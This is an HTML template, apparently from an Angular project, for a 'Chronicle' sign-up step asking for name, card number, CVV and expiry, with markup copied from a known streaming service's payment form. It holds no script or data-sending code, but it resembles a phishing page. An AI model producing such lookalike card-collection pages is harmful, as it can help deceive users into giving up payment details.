<!DOCTYPE html>
<html data-triggered="true" lang="en">
    <body>
        <header>
            <a class="name" routerLink="">Chronicle</a>

            <div class="wrap"></div>

            <div class="menu"><a routerLink="">Log Out</a></div>
        </header>

        <div>
            <div>
                <div>
                    <div class="simpleContainer" data-transitioned-child="true">
                        <div class="centerContainer firstLoad narrowCenterContainer">
                            <div class="planFormContainer" data-uia="form-plan-selection">
                                <div class="stepHeader-container" data-uia="header">
                                    <div class="stepHeader" data-a11y-focus="true">
                                        <h1 class="stepTitle" data-uia="stepTitle">Set Up a Payment Method</h1>
                                        <span id="" class="stepIndicator" data-uia="">Step <b>4</b> of <b>4</b></span>
                                    </div>
                                </div>
        
                                <div class="form__container">
                                    <form>
                                        <div class="small__fields">
                                            <div data-testid="fname" class="FName__FNameWrapper">
                                                <div class="data__field">
                                                    <div class="label__tag">
                                                        <label for="fname">First name</label>
                                                    </div>
        
                                                    <input type="text" id="fname" inputmode="alpha" name="fname" placeholder="First name" required="" value="" class="input__field">
                                                </div>
                                            </div>
                                            
                                            <div data-testid="lname" class="LName__LNameWrapper">
                                                <div class="data__field">
                                                    <div class="label__tag">
                                                        <label for="lname">Last name</label>
                                                    </div>
                                                    
                                                    <input type="text" id="lname" inputmode="alpha" name="lname" placeholder="Last name" required="" value="" class="input__field">
                                                </div>
                                            </div>
                                        </div>

                                        <div class="data__field">
                                            <div class="label__tag">
                                                <label for="CCnum">Card number</label>
                                            </div>
                                            
                                            <input type="numeric" id="CCnum" name="CCnum" placeholder="Enter your card number" required="" value="" class="input__field">
                                        </div>
                                        
                                        <div class="small__fields">
                                            <div data-testid="CVV" class="CVV__CVVWrapper">
                                                <div class="data__field">
                                                    <div class="label__tag">
                                                        <label for="CVV">CVV</label>
                                                    </div>
        
                                                    <input type="text" id="CVV" inputmode="numeric" maxlength="3" name="day" placeholder="CVV" required="" value="" class="input__field">
                                                </div>
                                            </div>
                                            
                                            <div data-testid="XD" class="XD__XDWrapper">
                                                <div class="data__field">
                                                    <div class="label__tag">
                                                        <label for="XD">Expiration date</label>
                                                    </div>
                                                    
                                                    <input type="text" id="CD" inputmode="numeric" maxlength="5" name="XD" placeholder="MM/YY" required="" value="" class="input__field">
                                                </div>
                                            </div>
                                        </div>
                                        
                                        <div class="submitBtnContainer firstLoad">
                                            <button type="submit" class="btn nf-btn nf-btn-primary nf-btn-solid nf-btn-oversize">Continue</button>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </body>
</html>